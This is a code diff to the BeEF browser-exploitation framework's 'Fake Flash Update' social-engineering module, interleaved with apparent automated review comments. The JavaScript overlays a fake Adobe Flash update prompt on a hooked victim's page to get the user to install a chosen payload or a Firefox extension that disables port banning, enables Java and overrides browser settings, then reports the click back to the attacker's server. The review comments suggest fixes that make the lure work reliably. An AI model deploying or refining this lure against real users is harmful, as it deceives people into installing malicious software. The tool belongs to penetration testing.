diff --git a/modules/social_engineering/fake_flash_update/command.js b/modules/social_engineering/fake_flash_update/command.js
old mode 100644
new mode 100755
index 0cc853ad6..c408886f1
--- a/modules/social_engineering/fake_flash_update/command.js
+++ b/modules/social_engineering/fake_flash_update/command.js
@@ -6,37 +6,40 @@ beef.execute(function() { - // Grab image and payload from config - var image = "<%== @image %>"; - var payload_type = "<%== @payload %>"; - var payload_root = "<%== @payload_root %>"; - var chrome_store_uri = "<%== @chrome_store_uri %>"; - var firefox_extension = "/api/ipec/ff_extension"; - var payload = ""; + // Module Configurations + var image = "<%== @image %>"; + var payload_type = "<%== @payload %>"; + var payload_uri = "<%== @payload_uri %>"; + var beef_root = beef.net.httpproto + "://" + beef.net.host + ":" + beef.net.port; + var payload = ""; + + // Payload Configuration switch (payload_type) { - case "Chrome_Extension": - payload = chrome_store_uri; - break; + case "Custom_Payload": + payload = payload_uri; + break; case "Firefox_Extension": - payload = payload_root + firefox_extension; + payload = beef_root + "/api/ipec/ff_extension"; break; default: - beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer=Error. No Payload selected.'); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'error=payload not selected'); break; } - // Add div to page - var div = document.createElement('div'); - div.setAttribute('id', 'splash'); - div.setAttribute('style', 'position:absolute; top:30%; left:40%;'); - div.setAttribute('align', 'center'); - document.body.appendChild(div); + // Create DIV + var fakediv = document.createElement('div'); + fakediv.setAttribute('id', 'fakeDiv'); + fakediv.setAttribute('style', 'position:absolute; top:20%; left:30%; z-index:51;'); + fakediv.setAttribute('align', 'center'); + document.body.appendChild(fakediv); + // window.open is very useful when using data URI vectors and the IFrame/Object tag // also, as the user is clicking on the link, the new tab opener is not blocked by the browser. 
- div.innerHTML= ""; + fakediv.innerHTML = ""; + $j("#splash").click(function () { $j(this).hide(); - beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer=user has accepted'); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=user has clicked'); }); }); diff --git a/modules/social_engineering/fake_flash_update/config.yaml b/modules/social_engineering/fake_flash_update/config.yaml old mode 100644 new mode 100755 index 8922b69dc..36841d3f0 --- a/modules/social_engineering/fake_flash_update/config.yaml +++ b/modules/social_engineering/fake_flash_update/config.yaml @@ -9,7 +9,7 @@ beef: enable: true category: "Social Engineering" name: "Fake Flash Update" - description: "Prompts the user to install an update to Adobe Flash Player.
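Review bot: The click handler at the end of this hunk still selects `$j("#splash")`, but the container created above now has the id `fakeDiv`, so unless the markup assigned to `fakediv.innerHTML` (its content is not visible in this rendering) contains an element with id `splash`, the handler never fires and no `result=` is reported. Binding to the new id, `$j("#fakeDiv").click(function () {`, keeps the two in step. The `default:` branch also reports `error=payload not selected` and then carries on to build the overlay with an empty `payload`; a `return;` after that `beef.net.send` call would stop there. The file header additionally changes the mode from 100644 to 100755, as do the config.yaml and module.rb headers; nothing in the diff shows these files being run directly, so the executable bit looks unintended.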
The file to be delivered could be a Chrome or Firefox extension.

A Chrome extension has privileged access and can do a whole lot..
See chrome extensions beef modules for more examples
See extensions/demos/flash_update_chrome_extension for extension source. Note: the Chrome extension delivery will work on Chrome <= 20. From Chrome 21 things changed in terms of how extensions can be loaded. See extensions/demos/flash_update_chrome_extension/manifest.json for more info and a sample extension that works on latest Chrome.

The Firefox extension is disabling PortBanning (ports 20,21,22,25,110,143), enabling Java, overriding the UserAgent and the default home/new_tab pages.
See extensions/ipec/files/LinkTargetFinder dirrectory for the Firefox extension source." - authors: ["mh", "antisnatchor"] + description: "Prompts the user to install an update to Adobe Flash Player.
The delivered payload could be a custom file, a browser extension or any specific URI.

The provided BeEF Firefox extension disables PortBanning (ports 20, 21, 22, 25, 110, 143), enables Java, overrides the UserAgent and the default home/new_tab pages.
See /extensions/ipec/files/LinkTargetFinder directory for the Firefox extension source code.

The Chrome extension delivery works on Chrome <= 20. From Chrome 21 things changed in terms of how extensions can be loaded.
See /extensions/demos/flash_update_chrome_extension/manifest.json for more info and a sample extension that works on latest Chrome." + authors: ["mh", "antisnatchor", "gcattani"] target: user_notify: ['ALL'] diff --git a/modules/social_engineering/fake_flash_update/img/eng.png b/modules/social_engineering/fake_flash_update/img/eng.png new file mode 100644 index 000000000..0251d83e5 Binary files /dev/null and b/modules/social_engineering/fake_flash_update/img/eng.png differ diff --git a/modules/social_engineering/fake_flash_update/img/ita.png b/modules/social_engineering/fake_flash_update/img/ita.png new file mode 100644 index 000000000..e3c773f60 Binary files /dev/null and b/modules/social_engineering/fake_flash_update/img/ita.png differ diff --git a/modules/social_engineering/fake_flash_update/module.rb b/modules/social_engineering/fake_flash_update/module.rb old mode 100644 new mode 100755 index 25ed298f5..854249bb2 --- a/modules/social_engineering/fake_flash_update/module.rb +++ b/modules/social_engineering/fake_flash_update/module.rb 
@@ -5,29 +5,38 @@ # class Fake_flash_update < BeEF::Core::Command + def pre_send + + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engineering/fake_flash_update/img/eng.png', '/adobe/flash_update', 'png') + + end + def self.options + configuration = BeEF::Core::Configuration.instance + proto = configuration.get("beef.http.https.enable") == true ? "https" : "http" - payload_root = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}" - image = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/adobe_flash_update.png" + + image = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/adobe/flash_update.png" return [ - {'name' =>'image', 'description' =>'Location of image for the update prompt', 'ui_label'=>'Splash image', 'value' => image}, - {'name' =>'payload_root', 'description' =>'BeEF (Payload) root path', 'ui_label'=>'BeEF (Payload) root path', 'value' => payload_root}, - {'name' =>'chrome_store_uri', 'description' =>'Chrome WebStore Extension URI', 'ui_label'=>'Chrome WebStore Extension URI', 'value' => ""}, - { 'name' => 'payload', 'type' => 'combobox', 'ui_label' => 'Payload', 'store_type' => 'arraystore', - 'store_fields' => ['payload'], 'store_data' => [['Chrome_Extension'],['Firefox_Extension']], - 'valueField' => 'payload', 'displayField' => 'payload', 'mode' => 'local', 'autoWidth' => true - } + {'name' =>'image', 'description' =>'Location of image for the update prompt', 'ui_label'=>'Image', 'value' => image}, + {'name' => 'payload', 'type' => 'combobox', 'ui_label' => 'Payload', 'store_type' => 'arraystore', + 'store_fields' => ['payload'], 'store_data' => [['Custom_Payload'],['Firefox_Extension']], + 'valueField' => 'payload', 'displayField' => 'payload', 'mode' => 'local', 'autoWidth' => true, 'value' => 'Custom_Payload'}, + {'name' =>'payload_uri', 'description' =>'Custom Payload URI', 
'ui_label'=>'Custom Payload URI', + 'value' => "https://github.com/beefproject/beef/archive/master.zip"} ] end - # - # This method is being called when a zombie sends some - # data back to the framework. - # def post_execute - save({'answer' => @datastore['answer']}) + + content = {} + content['result'] = @datastore['result'] + save content + + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/adobe/flash_update.png') + end end
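Review bot: `post_execute` copies only `@datastore['result']`, while the `default:` branch of command.js in this same commit reports `error=payload not selected`, so that failure appears to be saved as an empty result. Carrying the key through, for example `content['error'] = @datastore['error'] unless @datastore['error'].nil?`, would keep the stored record accurate. The asset bound in `pre_send` is released only inside `post_execute`; assuming `post_execute` runs once per reply (the hunk does not show this), the first reply removes `/adobe/flash_update.png` for any other recipient of the same command, and a command that never gets a reply leaves the path bound. A comment stating the intended lifetime of the binding would help. `pre_send` also always binds `img/eng.png`, so the `ita.png` added by this commit is unused as far as the diff shows.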